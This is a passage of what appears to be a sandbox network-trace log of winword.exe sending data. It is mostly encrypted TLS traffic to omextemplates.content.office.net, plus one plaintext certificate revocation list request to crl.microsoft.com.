\\xe3#\\xaa\\xc1\\x86\\x90k\\xbe\\x06\\xf8!\\x0f"
509.  
510.  
511. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x8e\\xbe\\xae\\x98\\xc6n\\x00x\\xcc\\xd7\\xbf\\x9bj\\x1b\\xe8\\xbd\\x12\\xcb8\\x81\\x7f\\x0ff\\xa8\\x9a\\x97y\\xf0\\xb3\\x85\\xa2r\\x88\\xf2\\xf2\\xcd*\\x86kht\\xb6\\xb3\\xe0\\xb5\rt\\xa1\\x0b_\\xab\\x90\\xb8u-g\\xe5\\x91/\\xd6z\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf4xk\\xcd\\x9b\\x0e-\\xe9\\xc6\\x84\\xfb\\xa3\\x88\\x92\\x85\\x87\\xf82y\\x18\\x12fv\\x97\\xa3u.'#\\xaf\\xcf\nw\\xff\\x07z;i\\x19p\\xc7t\\x8a\\x8bxz\\xbd"
512.  
513.  
514. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xd1\\x07#\\x13\\x12\na\\x7f\\xa6o(4\\x12\\xd8d\\xd3g9\\xee\\xc6\\xf19h=m\\xe9\\xb6v\\x90\\xfd\\xd9\\xad\\xb4u\\x91 \\\\x93\\xd9h\\x9fz\\x13#+7\\x9db\\xcc8\\xf3h\\xfa\\xcf\\xe6\\xb6\\x10b\\x97\\xb2\\x05\\x19\\xcc8\\xab\\x92\\x01\\xeb\\xaau\\xefe\\x8a<\\x80\\x8c\\x9f\n\\x00\\x00z\\xedf\\x01\\xfd\\xcdt\\xe8\\x11\\x15\\xd19\\xa8t \\xe2\\x1d?(c:\\xd3\\xd0\\x87\\x94\\x8f-^\\x9d\\xfe\\xfc\\x8b\\x94\\xb2\\x89\\xa0\t\\xf7f\\x81\\xe2\\xae\\xfbp\\x03\\x0c\\xcb\\x870\\xfb\\xe6\\xe3x\\xbb\\xae\\x9ay _\\xbd:\\xca\\x96\\x85)-x\\xc8m\\x17\\xed\\xdd\\x13\\x12%\\xac\\x0f\\xac\\xf8\\xe2\\xdf\\\\xa7b;\\x1dhn\\xcb\\xa597b\\xf8\t\\xe0^p\\xf1\\x90|\\x85\\x0b\\xecw\\x99i\\x94|\\xf4r\\x0fu\\xe1\\xeb\\xcb\\xad\\x8ax|\\xd7\\x01\\xdf|\\x14w+\\xd8fl\\x15\\x0f\\xb28\\x15\\xac\\x882j\\x1c\\xaf\\x84\\x80mg\\xa2\\xe0\\x05u\\x8dj\\xf9\\x8f\\xfe?\\x08\\x08gmwy\\x8f\\x10\\xb0g/"
515.  
516.  
517. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x0108i\\x86ygb\\xda\\xbc>ewj\\xfe\\xe5t\\xe9\\xcc\\xb5\\x14\\x1d\\xa6ih\\xd5v\\xde?)\\xd4u\\x9d\\x19\\xccj\\xe3\\x86\\xd3|5*\\x02\\x8b\\x03&\\x16\\x9a\\xfc\\xd0a\\xfad\\x1e\\x19\\xf7&6\\x9b\\xfc\\xef$_`\\xe5\\x13s\r\\x98\\xc0\\x13\\xc6\\xf3\\xf2n_\\xb4i\\xff\\x8em9s\\x06\\x8e:~o\\x1a4+4\\x05\\x07f\\x07\\x10\\xe69\\xa6s\\xdd_\\x83\\xd7%\\xfd\\xe3\\xb5\\xf7\\xa1t\\xd7\\x8d\\x8a\\xb2k\\x83m\\xeby\\xf0gw\\xd82\\x080\\x1a\\xd5\\x1e\\xa8s\\x1bt%v\\xa2\\x14\r\\x96~\\x7f6\\x11\\x01\\xdc\n\\xa8z!m\\xcb\\xbf\\xabu\\xa8\\xbe\r\\xa3a~\\x0b^\\xe0.\\xa9\\x0es\\xa8\\xac\t\\xea\\x8d\\xb0\\xfa~\\xd4\\xca\\xa4\\xa8\\x89\\xb5\\x03-n\\xa3\\xcb\\xac\\xde yu\\xbdj\\xc2%\\xe9+m\\xd2:\\xfe\\xb9\\xb2\\xf1~aq\\x02\\x1b\\x11p.\\xa7\\x9e\\x12\\xc5\\xfd\\xec1?x\\x12m)n\\xfd\\x8e\\x82\\x89\\x12+\\xa7\\xade\\x03\\x91\\x83\\xdc\\x1e\\xfe\\xfa\\xdf$\\x14\\xaf\\x8b9\\\\x08\\xab"
518.  
519.  
520. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xf4\\xbe\\xaeq\\xea\\xfd^\\xf9g\\xd2\\xc9a\\xf1\\xf6\\xfe`\\xdd\\xaey\\xd6\\xba\\x12c\\x08,\\xc8\\xcd\\xb4r\\x9b\\xadayag\\x8be\\x08`\\xc9\\xbf\\xe9\\x97f\\xb7\\xa9\\x97\\xcb\\xc3a\\x84a\\xf3\\x08\\xe9\\x07\\xec\\xab\\x8f57\\x9d\\xa6\\xc6\\xd0w2\\xb5\\xef\\x0fd\\x81\\xe1f\\x9c\\xae\\xf1\\xd9\\xa1\\x95\\x0bbv\\xb9\\x7f\\x1b\\x15\\xd8u\\xfd\\x01,\\xb52\\xae\\xf8\\xba\\x8b\\xd3o\\xc8f\\xc1\\x10a\\x80\\xb2\\xbb\\x1d\\x84\\xf0\\x9e\\xe24bn8o\\x00|\\xe1\\xec`\\x1c\\xa4\\x04r\\xf7\\xede\"\\x8fld\\x96\\xc3\\xbd@\\x96u\\xf9hy\\x9av?\\x0c+z\\xd0b\r`\\xcc\\x9b.9\\xc5\\xc4\\xd7h\\x8bx\\x0e~\\xf3\\x80\\xec\\xb6\\xee=*\\x9a\\x95\\xb1\\xc5d\\xf9\\x1a7\\x1bz\\x186\\x8e\r\\x8b\\x0f\\x192\\xf6e\\x8b\\xa5\\xe5m\\xf1\\xa0\\x98'\\xbd>\\x03\\xba\\x1e?n\\xc9`\\xa99\\x95c\\xe0\\xef/\\xc2k\\xf84\\xb8\\xa5\\x1chs\\xd6\\xe2\\xa6\\xe5\\xab\\x08%\\xc7\\x97<\\xa7\\xa4\\xb3$\\x931\\xc2\\xf9"
521.  
522.  
523. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xf0p\\x81h9\\x8c\\xa9\\x8a\\xf8\\xa1\\xcd\\xfa\\x00\\x15w\\xcf\\x86\\x7f\\\\x8e%\\x19yq\\xae\\x14\tv\\xdb\\xe5\\x05\\xcf\\xcc\"\\xe6\\x97l\\x9d\\x93\\xf2\\x82|\\xc0?\ncx\\xe6n\\xe8\\xfc\\xdf\\xa6\\xc9\\x03v_\\xb9\\x01 \\xe4z\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xfe\\xc8\\xae@\\x0er\\xef;\\xe3\\x9f5\\x90\\x01\\x1f\\xcd6\\xcb\\x8bz?\\x0f\\x93\\x02ee\\xe2sj\\x15m\\x96\\x04=g\\xbefk\\xbb\\x99q\\xe0%\\xa3\\xb1\\x99\\x8f"
524.  
525.  
526. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010im\\xc1\\xc0\\xef\\x85\\x1f\\xd24\\xd4\\xf2#>plez\\xdf\\x81\\xb2\\xd3\\x1b\\xb5\\x80\\xea)w\\x02\\x87\t\\x01\\xe3\\xb8\\xbb\\xc3\\xee\\x1c\\xf8\\x8b)\\xcc\\x80\\xeaw\\xdf\\x15\\xf4\\xc7*\\xb3\\x8d@\\xf4\\xc1\ne\\xe0\\v \\x12\\x80\\xb8j\\xc5\\xad\\xcc\\xd2\\xec&\r|\\xb5\\xbe\\xb1\\xe0\\xd9tr\\x9bb\\xe5\\xd0p.k(c\\xadu\\x06\\x85\\xbd&\\xe5\\x0b\\xda)\\x9e(\\x993\\xa6k\\xc6\\xed\\x978\\x87\\x1f\\x08k\\x0f\\x1br\\x89r0\\xf2c\r\\x80\\x16;\\x91\\xa9\\x91&\\xb7\\x1dp=\\xa3\\xdc\\x94\\xd0\\x93\\xf0\\x04\\xeb\\xb3\\xef\\xf3\\xe1\\xddp\\x96\\xdd^\\xb9\\xe3+\\x11\\x91\\x8e\\x15b\\xfb\\xeb-z*k\\xc2\\xbc-d:8\\xa3\\x7f\\x84v\\xd3y\\x18\\xd1\\x951\\x84\\xa4b=\\xf3\\xb3\\xa6g\\xc8\\x18.djf\\xf3\\xd9?v\\xef\\x9a\";\\x01w8q\\x8ay\\xf8\\xaf\\xb9\\x9a\\x0fb\t_\\xa7r\\x04\\xed\\xe9e\\\\xa1\\x83\\x9c~\\xf3'\\xe2\\x8d4\\xe5\\xa9\\xa1\\xb1\\x88h\t\\x08\\xda\\x12\\xb0\\xfan\\xef&e\\x15"
527.  
528.  
529. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb1+al\\xd1\\xe2\\xec\\xb31\nc\\xc4$\\x88\\x07\\xa1\\xedt\\xcf\\xddce\\x1d\\x8dj\\xee\\x0f\\xb8\\xd3\\x10\\x8dn\\x0c56\\xdfya\\x0c\\x8a\\xfc\\x1c\\xf8y\\x15\\x98\\x9e\\xf0a\\x87\\xbe,\\x88\\xa8\\xd7\\xec\\xb7\\x8c\\x8a&)8z\\xb2\\x9ec\\x9d\\x8c\\xf8\\xcf\\x0b\\x92\\x98\r\\xc8trq\\xa0\\xc2\\xa2d\\xc0\\xf08r;<\\x90\\x89\\x0ev\\xc0\\xc0\\x95\\x08\\x1a\\xac!\\xaa\\xa0&u\\xee\\x0f\\xab\\xef\\x18u\\xb9|\\xa1\\xd2l\\x02\\xe9p\\x8c\\x93j\\x1b\\xabs\\xf3e\\xd3\\x90\\xfd$2\\xac\\xfe\\xda\\xca`\\xeb\\xa8\\x96@\\x93'\\xf2;\\xaby\\x0b\\x90\\xc0\\xc2\\x18\\xcdfq\\x13\\xc3\\x89\\x8e\\x93\n\\x8dw\\xba\\x90\\xd0\t\\xd4\\xe7\\xe5\\xc2\\x10\\x8d\\xa3n\\xe6u\\xe4\\xd9\\xbd\\xc8\\xee\\xd7\\xb1d\\xb4f\\xf9\\xa4\\xff\\xd7a\\xa3\\x05\\x15\\xe3\\x08a\\x8b\\xb79=\\x1a h\\x1e\\x01<g\\x13\\x08\\x86oa\\xcb\\xdee\\xdd,e\\x9f\\xdfy\\xd3\\xdd\\xde=\\x8c\\x1e\\xad|\\xb1r\\x91\\xf4\\x90\\x99\\xb3\\xde\\xca\\x13\\x92w\\x982p"
530.  
531.  
532. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010^\\x16hn\\xbb\\x173w\\xa1\\xf9\\x0e\\xa3\\xe6bfq\\x9c\\xa6\\xf8\\x0fw\\xed\\xd0l\\xf8\\xfa\\x95.\\xc4\\xa0\\xad\\xea\\xd2l\\x16a\\xaa\\xaa\\x01\\xef\\xa6\\xb7\\xb3\\xe7ba\\x84z$\\xb3\\x9d\\xf7\\xec\\xeb\\x1e#%\\xdee\\x14p'8z\\xeci\\xbcdf\\x9b\\\\xab%\\x81\\x10\r\\xa8\\xc9x\\x01c\\xdcn\r\\x11\\xba\\xdc\\x87\\x0e\\xb8\\xcf\\x03\\xb11\\x10ix\\x902o\\xbf\\xfa3\\xc8\\xc5\\xcd\\x0e2\\xc3\\x06\\xff!d\\xf9\\xcd\\xc1\\x8ea\\xb9\\xa0\\xb2\\x9e\\xb4\\xa6\\x04!\\xf6bb=5\\x02+\\x85\\xeaz\\xf9\\x10,\\xb7\\x89\\xec\\x13b\\xe9\\x14\\xa3\\x1a?\\xf9\\xf7\\xe2\n\\xe6\\xe5&\te\\x0f\\xd5\\xf0n/\\xc3npt\\xf5\\xa5x~\\xca/-x::\t\\xb7\\x86s\\xb7\\xe8\\x0f'\\xb4\\xe8:\\xc2\\x97\\xed\\xdf`\\xcb_s/\\xa3\\xc7\\xcc\\xb3\\x17v\\xa4au\\xf66~\\x9a\\xbc\\x03\\xba\\x8a\\xad\\xb6jh\\xf3\\xe7\\xf82&\\x02\\xf9\\x81#il\\x1b\\x84\\xc3^c(\\x0b\\x03g\\x81\\x11\\x0cyy@\\x17\\xfd\\x90\\x96"
533.  
534.  
535. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb3kp\\xe3\\xf9\\xf8\\xed\\xf8q\\xb9i\\xb2\\x8d\\x0e\\xd2\\xda\\xd6'c\\x16\\xc95?6b\\x15\\xd5\\xd5\\x7fy\\xcb>\\x9f\\x08\\xf8\\xdf\\xbe\\xf3\\x10\r\\x87\\xaba\\x03\n\\x96\\xa3s~\\x11r\\xde\\xfezml\\x15\\xe7jy\\x8c\\x89\\xbd\\xa6\\x1a>$\\x91\\x7fh6\\xbd\\x87\\xb04w\\x1fu\\xae|\\xe0yz9o\\x9a\\x12\\x83x-\\xa3\\xe3\\x8b\\xb1\\xbf\\x83\\x17m\\x9a\\xeei\\xa7%\\x1c^\\xf3-\\xaf\\xbe\\xd3\\x00\\xc7d\\x9d\\x91\\x9d.69\\xf2\\x9e\\x13\\x19k\n2+n\\x07\\xe6q\\xf2\\xbdnw\\xb1\\xb7\\xa7\\x01\\xeb\\x89\\xd5\\xc5e7$\\xc5\\xa4\\x9cn\\xf48\\x14\\x11=>\\x8f\\xadhu\\x9dzx\\xfa.#\\x90\\x87\\xa5\\xcd\\xc9-\\xa5\\xfd\\x19\\x85\\xcd\\x1b\\xa7\\xce\\x88\\xacn\\xcfi\\x06\r\\x08z\\xfb\\xbe\\xe3\\x80\\xd6\\xaf\\xc9\\x02\\x91\\xb4y\\xee6z\\xedr\\xd6\\xce\\x16\\xc4\\xa7c\\xfb\\x87\\xa5\\xe9o\\x05\\xb52\\x14\\x1e\\xa4\\xda\\xfbd\\x04\\x87\\xcemy\\xed\\xc1\\xd3\\x17:\\x93\\x08\\x84\\x83\\xcfn\\x93e\\x8f"
536.  
537.  
538. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x0c3u\\xeb\\x914d\\xa1\\xb2\\x87o\\xc9\\xe6\\xa7\\xb5\\x1d\\x15\\xba\\xc8/\\x851\\x99\\xdejtz?l\\xef:\nx\\x14\r\\xa92\\xaa\\xc8w\\xf1?`w\\xab\\xe0f\\xa14\\xb6tad\\xd4\nl-r:)\\xeb\\xd4\\xc3\\x9c\\xfa\\xa9\\x9a .fj\\x1dmc\\xe76\\x94\\xb4\\x0e\\xba\\x8d\\x12mmggwp\\xf7\\xe8\\xfb\\xf7\\x93\\xf8\\xf6\\xc3\\x0f\\xd8\\x1f\\xcb\\x7f\\x89\\xff\\xf8\\xccf\\xf4\\xef.8\\xe1\\xda\\x9e=\\xa4\t\\xca\\x8e\\xbf\\xc5\\xede\\xcaw-\\xd2\\xe0\\xa7\\x07)\"\\xd3+j\\xe0o\\xcfym\\xeb2\\x11\\x8a\\x9a\\xba~\\xc4\\xdb\\xae\\xa4\\xfc\\xd4(r\"\\xd0p\\xb5\\xab\n\\x84\\x19x\\xeb\\xe4e\\x84\\xa2*t\\x7f\\x12\\xd5\\x18&\\xd5\\x17zv,\\xf8g8\\x0bz\\xe7j\\xe5\\xeb\\xe0\\xd3\\x1fy\\xc28\\xfb~\\x16\\x9d-\\xb5\\x88\\x0cz)\\xe99\\xc8\\x9c\\xba\\xa9\\xdd:\\x10\\xb4s\\x8c@\\xc1\\xf5\\x15\\x84\\xa4\\xf4\\x11!<\\x04-o.\\x88\\xe0p\\xf4o\\xcd\\xf1v~"
539.  
540.  
541. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010ii\\xf4s\\xb8%c\\x9f\\x9c\\xce\\xf6z\\xb8m\\xdc\\xec\\xb9b\\x8c\\xee\\xf1\\xd8\\x0b!\\xeb\\x13\\x05\\x08j\\xe65x\\x1e\\xc8\\xfag\\x02\\x8c\\xd0\\xc3>/\\xaa:i\\x91\\xfa\\xc8=\\xcdg\\xd1\\x06;\\xad\\x1d\\x15\\xca\\x9f4\\xf6m\\x86a\\xc2\\xae\\xf7'\\x95\\x80q\\x01p\\x7f\\x02bse3<-\\xfe\\xbd\\xfa\\xf7\\xeeq_/\\xaa;\\xc1o\\xf8\\x80\\x04\\xd70\\x83\\x02\\xdew\\xde\\x18\\xd6\\xff\\xc9\\xca\\xe8\\xfa\\x1bn\\x11\\xb1\\x1b\\xf0e\\xdc\\x80p\\xa6\\xec8\\xabks\\xc5m\\xa3\\x9e\\x83%\\xb6\\x9e\\xc5\\x01v\\x9a\\x08a\\x8e\\xe3\\x1f\\d\\xe9\\xaf\\x134\\xecs\\xa0\\xd5\\x8bm0\\x93\"\\xa0-,\\xb3\\x8a\\xe7\\xa6h$\\x1b\\xd6\\x83\\x92\\x80\\xe20\\x8e\\xbc\\x13\\x1c\\xe7\\xab_\\x972\\xd1a\\xf1\\xd0\\xbc\\x9b\\x8bb\\xc7l|\\x9c\\xa1\\xf4ion\\x05/c\"8y\\xf7\\x80\\x98\\xf1\\xeb\\xde\\xd3?\r\\x194<q\\x14\\x809\\x8c\\xff/\\xbf5b\\xec6\\xabax\\x8d\\xfa&\\x1f|\\x18_\\xe3z\\x02y\\xe11"
542.  
543.  
544. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fm\\x08\\xab\\x99\\xfan\\x9c\\x06\\xcep\\x99\\xe8\\xea\\x1db\\x11\\xfe\\xf4\\xec\\xbbm!^.\\xfe7a\\x9e\\x7f\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
545.  
546.  
547. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fmeh\\xad\\xb0\\xcf\\xa6\\xd9\\xe7\\x06\\x1b\\xabj\\x8b\\xb9\\xb73\\xf8\\xe6@<\\xc6\\xb72o\\xf4\\xc1\\x1c\\xd3\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
548.  
549.  
550. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fm\\x1d\\xe7h\\x024\\xd6.\\x82\\xca\\xab\\x14\\xc589\\xf2^ih\\xf1\\xfc^\\xba^\\xfbx\\x81\\x99\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
551.  
552.  
553. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xafg\\xf1n\\x11\\xd4\\xa8\\xb3\\xd6^\\x16\\xeddlb\\xa4\\xbdo|\\xe6\\xa7\\xaf\\xfe\"`!a\\xb1\\xd85\\x10\t\\xe2>\\x15`\\x03\\xab0\\xcfo\\xf2j\\x90(\\x95q\\xf73),\\xe3\\x94\\xec\\xf8j\\x9b\\x8cjm\\xe8\\xc5\\x19\\x0f\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xfa\\xee\\x92%\\x82nq2\\xf1p\\xc6&u\\x05m\\xa9\\x0c\\x99\\x06;\\xee\\xb1\\x10\\xbd\\xb6\\x8d\\x8c\\xf9\\xf7\\xeb\\x03\\x06a\\xcd\\xcb\\x97z\\xd6\\x1c\\xc3\\x82\\xad\\xe5\\x96\\xa0\\xadc\\x0f"
554.  
555.  
556. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04.\\x81\\x91~;\\xc6w\\xcf\\x08\\xf14\\xd8\\x02'x\\xae/\\xa0\\xe9\\xfcm\\xb2d\\x91\\x1f\\xff\\xa6\\xa6\\xef\n\\xbe\\xf4\tl\\x112\\x0f1\\xa05.|\\xdb\\x8b\\x92\\xae\\xc6\\xb9\\x07hc\\xac(\\xf8\\x8bl\\xb1j\\xd7\\xf9\\xe4\\xe55!\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xba\\x00\\x10\\xbd\\x91\\xbb\\x95|\\xe1\\x1c\\xd0\\xe3x\\xd5\\xdf\\xdb\\xdeg\\x8b,n\\x00%\\xa1o\\xd0\\xfe\\xf9\\xdf4b\\x1c\\x83$\\x8eti\\xa0w8\t/\\xfe\\x1f\\x1f\\xf8"
557.  
558.  
559. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb3>i\\x9a\\x95\\xda\\xbf=&\\xd0\\xd1<inj\\xc8h0\\xaa@o\\xfdxiz\\xbb\\xa8\\xcew\\x1c\\x10\\xe2z\\x1f&\\xbds&\\x10\\xcf\\x15\\xf1\\xf8\\\\x98\\x12@\\x89\r\\x1d\\x00\\xc0\\xb2\\x1bz\\x18\\xf6$\\xeb\\xe7.\\x8ca\\x15\\xabx*\\xa1\\x95\\xeb\\xe6\\x11\\xbc\\xdc\\x9ff\\xb6\\x01p\\xf1\\x9a\\xdf\\x03\\xa1\\x1f\\xf2\\x99\\x9ez.\\xe1\\x8e9\\x1c\\x9fl\\xa97h\\xc2\\x92z\\x9b\\x8f\\x14-y\\xdc\\xde\\xac\\xcbw \\xa9\\x1e\\xed\\xccl\\xc2\\xcb3c\\xf7!\\x04\\x93``z\\xd8\\xe3\\xbat\\xc9\\xa7\\xb5l\\xa5\\xde|\r\\xcdc\\x99\\x1c\\x05\\x9b\\xe1\\xc9\\x13\\x14wm\\x04\\x83\\x1d\\xf8\\xf2`\\xf9d\\xbca_h\\x1e\\xf1\\x89\\x07\\xff\\x95\\x95n\\xa4~\\x08\\x8e\\x85\r\\xa6j\\x88m\\x07\\x1b\\xa4\\xca\\xf9i\\xd7.\\xbc\\x9df\\xe6\\x88sw)y6\\x80\\xac)z\\x03u-\\xab\\xd8p\\xb3\\x8b)1\\x0fd,\r\\x02\\xdb\\xc2\\xef\\xb5\\xb0i\\x18\\x0f\\xaf\\xb2*\\xbc\\xc7\\x8c\\x0fuo\\xae\\xea\\x18\\xd6%h\\xf3\\x93\\xbbep"
560.  
561.  
562. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04ko3\\xc1\\xca.\\x04\\xd8'\\xaan\\x9b\\xf4\\x85\\xd8\\x90f\\xa2y\\xed8\\x0e;f\\xb0\\xf3ix\\xe2\\x97\\xf1\\x1a\\xf5\\xb4>\t\\x8by\\x13i\\xc2\\x16\\x8d*k7dwz\\xbag7\\x1f_\\xb8\\x99\\xcd\\x02\\xfc\\xd0o\\x1ch\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x04\\xb4\\x13\\x138cl\\x98cl\\xdd\\x1f\\xb9\\xc5=\\x87w\\xc1fu\\xd3h\\xec\\xc5\\x905\\xcc\\x17nv\\x06\\x9e\\xae#l\\xeb\\xf35\\xfb\\xea\\x80\\xc5\\xe8i\\x05"
563.  
564.  
565. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010l\\xea\\xb6\\x03\\x8bc\\x03\\xd6\\xbb;a7z\\xdf^\\xcd\\xaf\\xde\\x8b\\xb3?\\x1c\\x1a\\x84\\xf7\\x97\\xcci\\x03\\x8e\\x01\\xa3d\\x81t\\s1\\x070\\xa9l\\xe3\tq^\\x0f\\xd9\\xfa\\xff\\x0b\\x05\\xbd\\xf5\r^\\x1e\\xd0m\\x1a\\x10$m\\x9f\\x84\\x90?f\\xe8\\xdd\\xaa\"\\xf9y\\x86xreui\\xf35d\\xc2\\xc5\\x9fyf!\\x97tx.\\xe5z\\xd0\\xc6\\x08j\\x93y,\\zkv+r\\xa4\\xc9~\\xf9\\x851y\"\\x03\\xd3~\\xdd\\xa9\r\\x9d\\xcb\\xf6\\x85\\xa5\\x00\\xdc\\x9f\\xd3po\\x85db\\\\xe9\\x7f\\xf9\\x90p*n\\x07b\\x04\\xcd\\xb7\\xd8\\xb3\\x98\\\\xe6\\xefh\\xc2y\\xfd\\xd3xf\\xff\\xe5\\xca2\\xe2w\\x88\\xdf\\\\x14^\\x7f\\x11\t\\xec\\x12s.8\\xda\\x0e\\xed1\\x08=\\xcc\\x1az\t\\xc5\\x16\\x94\\x08\\xda+\\xb1\\x81dz\\xea\\xa2\\xa24pk\\xa9\\xd3c-\\x07\\xad\\xa7\\xdd\\xab\\xc7\\x83\\xd33\\xe5\\xf7\\xd4\\xae\\x84<\\xfch\\x1dw2|\\x17a\\x17\\xe2\\xd2!4\\x11\\\\xed\\xfe\\xa2\\xbc\\xd8,q3"
566.  
567.  
568. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xbb\\x90\\x08\\xa2\\x85\\x85\\xd9r\\x03\"\\x86\\x89\\xe6\\xbb\\x8a\\x02<\\x94w&\\x84\\xd3\\xf9z\\xbaxx\"a\r\\xba\\xdb5\\xe9\\xc7l\\xd1\\xd5\\x81!\\xa9\\x07\\xdb\\xaa\\x1d)\\xf6\\x13\\xc3\\xaa\\xfd0\\xdar\\x97\\x06y\\xa3z\\x93\\xd0\\xfb\\xdd||vad.^\\xa0ob\\xf6\\x04\\x95#\\x10\\x1c!i\\xc3j/\\x81cqi\\xeb\\x02\\x86_\\x18rsu\\xe6?9\\x8b2q\\xee\\xf8\\xd6\\xb2\\x964\\xc0\\x00\\xfd\\x0f\\xf2\\x8be\\xf2q\\xa1lx*f\\xf9\\xde\\xa2a0\\xfb\\xe5^\\x1c\\x90\\xf0j\\xd8k\\xb7;\\xba=pb\rv\\x01\\xaf\\x01!\\xe8\\x93\\x84\\xc9\\xb4\\xec\\x10e\\x91f\\xe6x\\xf3\\x87\\x05\\xb6\\x06\\xc1+\\x85l\\xaa\n/\\xa2\\xaah\\xe5\\xca3\\xb3\\x87\\xfe\\xc5z\\xec\\xba\\x11\\x18\\x14\\x19\\xf9#\\xbdxcek\\xe1\\xce\\xc1n\"*\\x94k,vu\\xb4\\x0c@:\\xee\\xf7d\\x01.7c6\\x9d#\\x1ft\\x94y\\xf6?\\x1c\\x97\\x0c0m\\xfffyp^x\\x97n\\xf0\\x9ai\\xe5\\x1a\\xf2"
569.  
570.  
571. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fn\\xd5\\x00\\xb6\\x13\\xf7&\\x04\\xef\\x10(\\xcc\\xef\\x99\\x9f@\\x97\\x7f\\xf9\\x03\\xa5\\x85\\xe1\\x16\\xba\\xeegs\\xf7\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
572.  
573.  
574. "http_request": "winword.exe_WSASend_get /pki/crl/products/microsoftrootcert.crl http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: thu, 07 mar 2019 06:00:16 gmt\r\nuser-agent: microsoft-cryptoapi/6.1\r\nhost: crl.microsoft.com\r\n\r\n"
575.  
576.  
577. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fnwq\\xd9\\xd4\\xf0cc\\x17\\xce \\x17o\\x84\\x02\\xc7p\\xb8\\x86hw\\xaf\\x90\\x91\\xa6\\x95\\x10^\\xe2\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
578.  
579.  
580. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fn\\xfag\\xb06r\\x03i\\x8fog\\x8cw\\xb9t\\x9e\\xdc\\xe0m\\xc0\\xf2c\\xe2(\\xd2\\xf5.\\x19\\x81\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
581.  
582.  
